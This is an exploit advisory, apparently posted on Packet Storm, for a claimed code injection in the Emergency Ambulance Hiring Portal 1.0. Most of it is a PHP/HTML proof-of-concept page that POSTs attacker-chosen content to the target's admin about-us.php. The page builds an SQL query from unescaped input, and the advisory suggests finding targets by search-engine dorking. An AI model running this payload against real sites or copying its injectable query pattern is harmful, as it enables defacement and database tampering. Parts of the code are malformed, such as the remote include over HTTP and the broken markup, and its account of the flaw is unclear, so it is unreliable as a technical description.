Emergency Ambulance Hiring Portal version 1.0 suffers from a WYSIWYG code injection vulnerability.
7b43b9d23f12307ed0da163a4b20cc1867ad452d0156731cd3972715a734a359=============================================================================================================================================
| # Title : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Part 01 : about-us.php
[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php .
[+] Line 2 : Make sure to include your database connection here
[+] Line 44 : Send the form data using fetch API (Set your target url)
[+] save payload as poc.php in your localhost path .
[+] payload :
<?php
include('http://127.0.0.1/eahp/admin/includes/dbconnection.php'); // Make sure to include your database connection here
if (isset($_POST['submit'])) {
$pagetitle = $_POST['pagetitle'];
$pagedes = $con->real_escape_string($_POST['pagedes']);
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");
if ($query) {
echo '<script>alert("About Us has been updated.")</script>';
} else {
echo '<script>alert("Something Went Wrong. Please try again.")</script>';
}
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>indoushka | Update About Us Content</title>
<!-- NicEdit Script -->
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
<script type="text/javascript">
// Apply NicEdit to all text areas when the DOM is loaded
bkLib.onDomLoaded(nicEditors.allTextAreas);
// Function to handle form submission using JavaScript
function submitForm(event) {
event.preventDefault(); // Prevent default form submission
const pagetitle = document.getElementById('pagetitle').value;
const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content
// Prepare the form data to be sent
const formData = new FormData();
formData.append('pagetitle', pagetitle);
formData.append('pagedes', pagedes);
formData.append('submit', true);
// Send the form data using fetch API
fetch('http://127.0.0.1/eahp/admin/about-us.php', {
method: 'POST',
body: formData,
})
.then(response => response.text())
.then(data => {
alert('About Us content has been updated successfully.');
console.log(data); // Handle the response from the server
})
.catch(error => {
console.error('Error:', error);
});
}
</script>
<style>
/* Center the form container */
.editor-container {
max-width: 800px;
margin: 0 auto; /* Center horizontally */
padding: 20px;
text-align: center; /* Center the content inside */
}
/* Ensure the textarea takes the full width */
#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
</style>
</head>
<body>
<div id="app">
<div class="app-content">
<div class="main-content">
<div class="wrap-content container" id="container">
<!-- Page Title Section -->
<section id="page-title">
<div class="row">
<div class="col-sm-8">
<h1 class="mainTitle">Update the About Us Content</h1>
</div>
</li>
</ol>
</div>
</section>
<!-- Form Section -->
<div class="container-fluid container-fullw bg-white">
<div class="row">
<div class="col-md-12">
<!-- Centering the form using a wrapper div -->
<div class="editor-container">
<form class="forms-sample" method="post" onsubmit="submitForm(event);">
<div class="form-group">
<label for="pagetitle">Page Title</label>
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
</div>
<div class="form-group">
<label for="pagedes">Page Description</label>
<!-- NicEdit will enhance this textarea -->
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
</div>
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
</form>
</div>
</div>
</div>
</div>
<!-- End Form Section -->
</div>
</div>
</div>
</div>
<!-- Footer -->
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed